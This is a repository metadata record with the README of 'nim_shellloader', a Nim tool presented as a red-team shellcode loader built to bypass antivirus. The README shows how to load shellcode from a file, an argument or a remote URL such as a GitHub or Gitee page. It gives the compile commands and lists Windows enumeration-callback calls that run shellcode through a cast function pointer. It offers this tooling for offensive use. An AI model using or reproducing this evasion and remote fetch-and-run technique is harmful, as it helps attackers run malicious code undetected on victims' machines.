{"id":13843805,"url":"https://github.com/sh3d0ww01f/nim_shellloader","last_synced_at":"2025-04-09T16:23:48.984Z","repository":{"id":39332841,"uuid":"428294285","full_name":"sh3d0ww01f/nim_shellloader","owner":"sh3d0ww01f","description":"nim,免杀,红队,shellcode,bypass,apt,bypass-av.","archived":false,"fork":false,"pushed_at":"2023-02-14T14:32:58.000Z","size":4083,"stargazers_count":202,"open_issues_count":1,"forks_count":33,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-23T18:47:17.182Z","etag":null,"topics":["bypass-antivirus","nim","nim-lang","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Nim","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sh3d0ww01f.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-11-15T14:21:43.000Z","updated_at":"2025-03-09T05:56:20.000Z","dependencies_parsed_at":"2024-02-08T21:11:44.178Z","dependency_job_id":null,"html_url":"https://github.com/sh3d0ww01f/nim_shellloader","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sh3d0ww01f%2Fnim_shellloader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sh3d0ww01f","download_url":"https://codeload.github.com/sh3d0ww01f/nim_shellloader/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248065975,"owners_count":21042012,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-antivirus","nim","nim-lang","shellcode-loader"],"created_at":"2024-08-04T17:02:27.688Z","updated_at":"2025-04-09T16:23:48.966Z","avatar_url":"https://github.com/sh3d0ww01f.png","language":"Nim","funding_links":[],"categories":["Nim"],"sub_categories":[],"readme":"# nim_shellloader \n\n详见以下:\ndetails:\n# usage\n```\nloader.exe payload.bin\nloader.exe  (yourshellcode)\nloader.exe (http://xxxx/xxx)\n```\nput your url/bin/shellcode direct\n后面直接跟shellcode内容 或者bin文件名 或者网址就行\n\n\n①use shellcode:\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/1.gif)\n\n②use bin file\n\n使用bin文件加载shellcode\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/2.gif)\n\n③ load the shellcode which on your server(remote load)\n加载你服务器上的shellcode\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/3.gif)\n\nBesides,You can load shellcode which on your reposiotory(gitee,github,etc.) like this\n\n此外 你还可以把shellcode放在github，gitee的地方让loader去读\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/4.png)\n\nNotice:You must remove '\\x' on your shellcode\n\n注意:你必须去除你shellcode中的 \\x\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/5.png)\n\n\n查杀情况\n\n\n![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/6.png)\n\n# 编译 compile\n\nstep1:   setup  require   安装所需的库\n```\nnimble install https://github.com/khchen/winim\nnimble install https://github.com/status-im/nim-stew\n```\nstep2: generate exe   生成exe\n```\nnim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim\n```\n# Advise 建议\nwindows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingw\n\n\nIt's easy to have problem if you compile it on Windows Platform.In my opion,you'd better compile it on Linux\n\n\n如果出现 :```could not load:(libcrypto-1_1|libeay32).dll```\nIf Go wrong with :```could not load:(libcrypto-1_1|libeay32).dll```\n\n考虑是运行的平台问题 因为编译的时候i386是x86的   所以出现这个问题就把i386换成amd64\n\nI consider this is because of the wrong command(it didn't match target's platform ),so please change \"i386\" to \"amd64\",like following\n\n```\nnim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim\n```\n\nIf it is compiled on windows, you don't need to add ```-d:mingw```\n\n如果是windows上编译 则可以不用加```-d:mingw```\n## 你可能会在运行这个加载器上出现问题 如果你出现\n## It's possible that the shellcode_loader will go wrong with:\n could not load: (libcrypto-1_1-x64|libeay64).dll\n \n你可能需要解决这些库\n\nThat means you maybe need to solve these dll\n```\nlibcrypto-1_1-x64.dll\n\nlibenchant.dll\n\nlibpq.dll\n\nlibsasl.dll\n\nlibsodium.dll\n\nlibssh2.dll\n\nlibssl-1_1-x64.dll\n```\nYou can find them under the floder which belong to PHP\n\n这些库可以在windows下 php环境中找到\n\nAlso , you can download them on the Internet\n也可以从网上下载\n\n\n## 源码中的EnumSystemGeoID回调函数可以换成以下函数 等价\n## The callback function named \"EnumSystemGeoID\" in my source can be replaced with following function\n``` \n# Callback execution\n    EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①\n    EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②\n    EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③\n    EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④\n    EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤\n    EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥\n    EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦\n    EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧\n    EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨\n    EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩\n    EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11\n    EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsh3d0ww01f%2Fnim_shellloader/lists"}